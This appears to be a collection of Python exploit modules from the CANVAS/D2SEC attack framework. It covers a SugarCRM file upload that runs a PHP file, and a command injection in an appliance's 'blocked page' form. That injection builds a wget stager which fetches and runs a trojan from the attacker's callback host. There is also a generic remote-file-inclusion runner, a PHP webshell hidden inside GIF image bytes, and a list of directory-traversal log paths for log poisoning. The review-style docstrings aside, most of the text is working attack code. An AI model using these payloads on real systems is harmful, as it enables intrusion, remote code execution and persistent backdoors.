        #<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived">
        #not very pretty - but it works!
        response = UA.GET(self.composemailpage)
        #self.log(response)

        # NOTE(review): bare except also swallows unrelated errors (e.g. a
        # non-string response).
        try:
            userid = response.split("assigned_user_id=")[1].split("&")[0]
            self.log("Assigned User-Id: %s" % userid)
        except:
            self.log(
                "Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!"
            )
            return 0

        #push our file up
        # Fixed boundary: must match the one getfile() uses in the body.
        UA.addHeader(
            "Content-Type",
            "multipart/form-data; boundary=---------------------------3922242971797626524322043819"
        )
        response = UA.POST(self.composemailpage, self.getfile())
        #self.log(response)
        #{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"}

        # Pulls the "guid" value out of the JSON reply by string splitting
        # (see the sample reply above); bare except as before.
        try:
            prefix = response.split(",")[0].split(":")[1].strip("\"")
            ourphpfilename = prefix + ".php"
            self.log("our remote filename: %s" % ourphpfilename)
        except:
            self.log(
                "Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!"
            )
            return 0

        ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename
        self.log("Path to our file: %s" % ourfile)
        #execute our file!
        # Drop the multipart Content-Type before the plain GET.
        UA.clearHeaders()
        response = UA.GET(ourfile, noresponse=True)

        for i in xrange(0, 3):  #wait three seconds for callback
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret
    def run(self):
        """Exploit entry point: run a shell command through the end-user "blocked page" continue form.

        ``port`` and ``cmd`` come from ``self.argsDict`` with instance defaults
        (set elsewhere, not in view). An empty ``cmd`` selects "trojan mode":
        the command makes the target fetch ``trojanname`` from ``callback.ip``
        over plain HTTP into ``/tmp`` and execute it, while ``startHTTPServer``
        serves the file on a separate thread. The command is base64-encoded,
        embedded in the ``domain`` form field and decoded/evaluated on the
        target; its output is redirected to ``../backup/d2`` and read back
        from ``/backup/d2``.

        Returns:
            1 after the read-back (unlike the sibling modules there is no 404
            check, so 1 is returned even when no output file exists); never
            returns in trojan mode.

        Review notes: the TCP socket opened below is never used afterwards and
        never closed, and a failed ``connect()`` is only logged — the HTTP
        requests are sent regardless (bare ``except:``).

        Artifacts for defenders: ``backup/d2`` under the web root,
        ``/tmp/<trojanname>``, the target fetching from the callback address,
        and a ``c=blocked&action=continue`` POST whose ``domain`` field carries
        ``eval`` and a base64 blob.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))

        if (self.argsDict.get("cmd", self.cmd) == ""):
            # Trojan mode: download-and-execute stager served by our HTTP thread.
            self.TROJANMODE = 1
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        # Reachability probe only: s is not used after this and is never closed.
        s = self.gettcpsock()

        try:
            s.connect((self.host, self.port))
        except:
            self.log('Could not connect to port %s:%s' %
                     (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)

        # Output goes to ../backup/d2 relative to the script's directory; the
        # sudo'd clear_keys.pl invocation carrying the command is base64-encoded
        # so it survives the form field.
        self.cmd = '%s > ../backup/d2' % self.cmd
        self.cmd = base64.b64encode(
            'sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";%s;" /fakedir' %
            self.cmd)
        # Fixed fields: 'url' is base64 of http://www.d2sec.com, 'user_encoded'
        # is base64 of "d2". 'domain' decodes and evals the command on the target.
        params = urllib.urlencode({
            'url':
            'aHR0cDovL3d3dy5kMnNlYy5jb20=',
            'args_reason':
            'unknown',
            'filetype':
            'unknown',
            'user_encoded':
            'ZDI=',
            'domain':
            'http://www.d2sec.com;eval `printf %s | base64 -d`' % self.cmd,
            'raw_category_id':
            '1|2|3|4',
            'user':
            '******'
        })

        # self.protocol is assumed to be set on the instance.
        url = "/end-user/index.php?c=blocked&action=continue"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.POST(mainurl, params)

        # Read the output back; no 404 check here, so data may be an error page.
        url = "/backup/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        if (self.TROJANMODE == 1):
            # Keep this thread (and the HTTP server thread) alive indefinitely;
            # `return 1` is unreachable in this mode.
            while 1:
                time.sleep(1)
        else:
            self.log('[D2SEC] %s' % data)

        return 1
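    def download(self, widget):
        """Let the user pick AVDS networks in a dialog and save their XML reports.

        Opens the ``simple2.glade`` "exploit_dialog" with a multi-select tree
        (ID / Name / Date). The ID (column 0) of every selected row is
        collected into ``self.SelectedScan`` and handed to
        ``_fetch_avds_reports``, which writes each report to
        ``<exploitpath>/reports/`` and registers it in ``self.ReportFiles`` and
        ``self.treestore_2``. The dialog is destroyed on every exit path,
        including the "no scan available" early return and exceptions (the
        original skipped ``destroy()`` on that return and leaked the dialog).

        Args:
            widget: the GTK widget that emitted the signal; unused.

        Returns:
            None.
        """
        self.SelectedScan = []
        column_names = ['ID', 'Name', 'Date']
        gladefile = self.exploitpath + "simple2.glade"
        self.wTree2 = gtk.glade.XML(gladefile)

        handlers = {
            "on_start_clicked": self.start,
            "on_delreport_toggled": self.activatedel,
            "on_deselectall_clicked": self.deselectall,
            "on_selectall_clicked": self.selectall
        }
        self.wTree2.signal_autoconnect(handlers)

        self.loaddlg = self.wTree2.get_widget("exploit_dialog")

        # Best effort: a missing or unreadable d2.ico must not break the dialog.
        try:
            self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
        except Exception:
            pass

        # Init reports treeview (kept on self: the select/deselect handlers use it).
        self.treeview_3 = self.wTree2.get_widget("mytree")
        self.treestore_3 = gtk.TreeStore(str, str, str)
        self.treeview_3.set_show_expanders(False)
        self.treeview_3.set_model(self.treestore_3)
        self.treeselection = self.treeview_3.get_selection()
        self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)

        # One resizable, sortable text column per model column.
        for idx, title in enumerate(column_names):
            column = gtk.TreeViewColumn(title, gtk.CellRendererText(), text=idx)
            column.set_resizable(True)
            column.set_sort_column_id(idx)
            self.treeview_3.append_column(column)

        # Start downloader dialog; the finally guarantees it is torn down.
        try:
            result = self.loaddlg.run()

            if result == gtk.RESPONSE_OK:
                if self.treeselection.count_selected_rows() > 0:
                    model, paths = self.treeselection.get_selected_rows()

                    # Column 0 holds the network ID used in the API request.
                    for path in paths:
                        row = self.treestore_3.get_iter(path)
                        self.SelectedScan.append(model.get_value(row, 0))

                    self._fetch_avds_reports()
                else:
                    self.log("[D2 LOG] - No AVDS report selected")
        finally:
            self.loaddlg.destroy()

    def _fetch_avds_reports(self):
        """Download the XML report of every network in ``self.SelectedScan``.

        Each report is requested through the AVDS JSON API, base64-decoded,
        zlib-inflated and written to ``<exploitpath>/reports/<ref>``; the path
        is then appended to ``self.ReportFiles`` and ``self.treestore_2``.
        An API "error" entry or a non-JSON reply skips that network; a reply
        without "compresseddata" stops the whole batch (same as the original).

        Returns:
            None.
        """
        reports_dir = self.exploitpath + "reports/"
        for ref in self.SelectedScan:
            mainurl = "https://" + self.qhost
            UA = spkproxy.UserAgent(mainurl, exploit=self)
            # NOTE: the API key travels in the query string, so it ends up in
            # proxy and web-server access logs.
            data = UA.GET(
                self.jsonurl +
                "primary=vulnerabilities&secondary=report&action=getreport&format=xml&network=%s&apikey=%s"
                % (ref, self.apikey))
            try:
                response = json.loads(data)
            except ValueError:
                self.log("[D2 LOG] ERROR: report request returned non-JSON data")
                continue

            if "error" in response:
                error = response['error']
                self.log(
                    "[D2 LOG] AVDS ERROR [%s %s %s]" %
                    (error['type'], error['param'], error['message']))
                continue

            if "compresseddata" not in response:
                self.log("[D2 LOG] ERROR: No scan available")
                return

            xml = zlib.decompress(base64.b64decode(response['compresseddata']))

            if not os.path.exists(reports_dir):
                os.mkdir(reports_dir)

            # Same flattening as the Nessus downloader so a "/" in the ID cannot
            # place the file outside reports/.
            filename = reports_dir + ref.replace("/", "_")
            with open(filename, "w") as f:
                f.write(xml)

            self.ReportFiles.append(filename)
            self.treestore_2.append(None, [filename])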
    def run(self):
        """Generic web-exploit entry point: build the UserAgent, send one GET or POST, then check success.

        Steps: ``getargs()``; for ``version == 0`` run ``test()`` and abandon
        the run if it fails; default ``hostname`` to ``host``; pick the
        protocol from ``ssl`` and a BasicAuth object when a user is set; bind
        ``self.ua`` to ``protocol://hostname:port<basepath>`` (optional
        Content-Type); in RFI mode (``webserverport`` non-zero) start the local
        web server via ``set_up_webserver`` and later ``accept()`` one
        connection on ``self.server``; send the request chosen by ``verb``
        (body from ``getbody()`` or query string from ``geturlarguments()``,
        both not in view); finally return ``ISucceeded()``.

        Returns:
            0 when testing finds no vulnerable target; otherwise the
            ``ISucceeded()`` value.

        Review notes: the ``noresponse = True`` inside the ``webserverport``
        branch is immediately overwritten by the unconditional assignment that
        follows it; when ``verb`` is neither "POST" nor "GET", ``data`` is
        never assigned and the later uses raise NameError; the
        ``parse_command_response`` result is discarded.
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (self.name, self.host, self.port))
        self.log("Using version: %s" % self.version)
        if self.version == 0:
            ret = self.test()
            if not ret:
                self.setInfo(
                    "%s against %s:%d (failed: didn't find vulnerable target!)"
                    % (self.name, self.host, self.port))
                self.log("Testing didn't find vulnerable target")
                return 0
        # Fall back to the IP/interface when no virtual host name was given.
        if not self.hostname:
            self.hostname = self.host

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + self.basepath
        self.log("Targetstring: %s" % targetstring)
        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)

        if hasattr(self, "content_type"):
            self.ua.addHeader("Content-Type", self.content_type)

        # RFI mode: the target is expected to fetch something from our web
        # server; self.server is presumably created by set_up_webserver().
        if self.webserverport:
            self.set_up_webserver()
            # NOTE(review): dead assignment, overwritten two lines below.
            noresponse = True

        noresponse = True
        if self.command:
            #we do get the response if we are sending it a command
            noresponse = False

        # NOTE(review): no else branch — any other verb leaves data unbound.
        if self.verb == "POST":
            body = self.getbody()
            self.log("POSTING data of length %s" % len(body))
            data = self.ua.POST(
                self.targetpath, body, noresponse=noresponse
            )  #fix noresponce in POST noresponse=noresponse
        elif self.verb == "GET":
            data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(),
                               noresponse=noresponse)

        if self.command and data:
            # Return value is not used.
            blah = self.parse_command_response(data)

        if self.webserverport:
            #let's accept a connection if this is an RFI exploit
            #we should have timed out on the top connection
            ret = self.server.accept()
            if ret:
                self.log("Found callback to our web server: %s!" % ret)
        else:
            self.log("Recved result of: %s" % data)

        # The accept() result above is informational only; success is decided here.
        ret = self.ISucceeded()

        return ret
    def __init__(self):
        canvasexploit.__init__(self)
        #hostname="http://google.com"
        #elf.hostname=hostname
        self.ua=spkproxy.UserAgent("") #placeholder
        self.name=""
        #self.ssl=""
        self.webserverport=0 #set to non-zero to make it an RFI exploit

        self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
            chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
            chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
            chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
            chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
            chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+\
            """<?php 
	    error_reporting(0);
	    ini_set('max_execution_time',0);
	    print 'startz';
	    passthru(base64_decode($_REQUEST[SERVER_INFO]));
	    eval(base64_decode($_REQUEST[SERVER_INFO2]));
	    print 'endz';
	    exit;
	    ?>"""+\
                 chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
                 chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
                 chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
                 chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
                 chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
                 chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
                 chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
                 chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
                 chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
                 chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
                 chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
                 chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
                 chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
                 chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
                 chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
                 chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
                 chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
                 chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
                 chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
                 chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
                 chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
                 chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
                 chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
                 chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
                 chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
                 chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
                 chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
                 chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
                 chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
                 chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
                 chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
                 chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
                 chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
                 chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
                 chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
                 chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
                 chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
                 chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
                 chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
                 chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
                 chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
                 chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
                 chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
                 chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
                 chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
                 chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
                 chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
                 chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
                 chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
                 chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
                 chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
                 chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
                 chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
                 chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
                 chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
                 chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
                 chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
                 chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
                 chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
                 chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
                 chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
                 chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
                 chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
                 chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
                 chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
                 chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
                 chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)

        self.log_paths = [
            "../../../../../../var/log/apache2/access.log",
            "../../../../../../var/log/apache2/error.log",
            "../../../../../var/log/apache2/access.log",
            "../../../../../var/log/apache2/error.log",
            "../../../../../var/log/httpd/access_log",
            "../../../../../var/log/httpd/error_log",
            "../apache/logs/error.log",
            "../apache/logs/access.log",
            "../../apache/logs/error.log",
            "../../apache/logs/access.log",
            "../../../apache/logs/error.log",
            "../../../apache/logs/access.log",
            "../../../../apache/logs/error.log",
            "../../../../apache/logs/access.log",
            "../../../../../apache/logs/error.log",
            "../../../../../apache/logs/access.log",
            "../logs/error.log",
            "../logs/access.log",
            "../../logs/error.log",
            "../../logs/access.log",
            "../../../logs/error.log",
            "../../../logs/access.log",
            "../../../../logs/error.log",
            "../../../../logs/access.log",
            "../../../../../logs/error.log",
            "../../../../../logs/access.log",
            "../../../../../etc/httpd/logs/access_log",
            "../../../../../etc/httpd/logs/access.log",
            "../../../../../etc/httpd/logs/error_log",
            "../../../../../etc/httpd/logs/error.log",
            "../../../../../var/www/logs/access_log",
            "../../../../../var/www/logs/access.log",
            "../../../../../usr/local/apache/logs/access_log",
            "../../../../../usr/local/apache/logs/access.log",
            "../../../../../var/log/apache/access_log",
            "../../../../../var/log/apache/access.log",
            "../../../../../var/log/access_log",
            "../../../../../var/www/logs/error_log",
            "../../../../../var/www/logs/error.log",
            "../../../../../usr/local/apache/logs/error_log",
            "../../../../../usr/local/apache/logs/error.log",
            "../../../../../var/log/apache/error_log",
            "../../../../../var/log/apache/error.log",
            "../../../../../var/log/access_log",
            "../../../../../var/log/error_log",
            "../../../../../../var/log/apache2/error.log"]

        self.useragents = [
            "Googlebot/2.1 ( http://www.google.com/bot.html)",
            "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
            "Mozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
            "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0)",
            "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
            "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5",
            "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
            "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20070321 Netscape/9.0",
            "Opera/9.23 (Windows NT 5.0; U; en)",
            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            "Mozilla/4.8 [en] (Windows NT 6.0; U)",
            "Opera/9.20 (Windows NT 6.0; U; en)",
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4",
            "Opera/9.20 (X11; Linux i686; U; en)",
            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy)",
            "Opera/9.10 (Windows NT 5.1; U; en)",
            "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12",
            "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.3 (like Gecko)",
            "Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4",
            "Opera/9.23 (X11; FreeBSD 6 i386; U; en)",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5"]
Ejemplo n.º 29
    def run(self):
        """Authenticate to the appliance's web login and run a command through it.

        The host comes from ``self.target.interface``; ``port``, ``username``
        and ``password`` come from ``self.argsDict``.  When no ``cmd`` argument
        is supplied the module switches to stage mode: it calls
        ``self.maketrojan()``, encodes the bytes of ``self.mosdeftrojan`` as
        printf-style hex escapes and assembles a
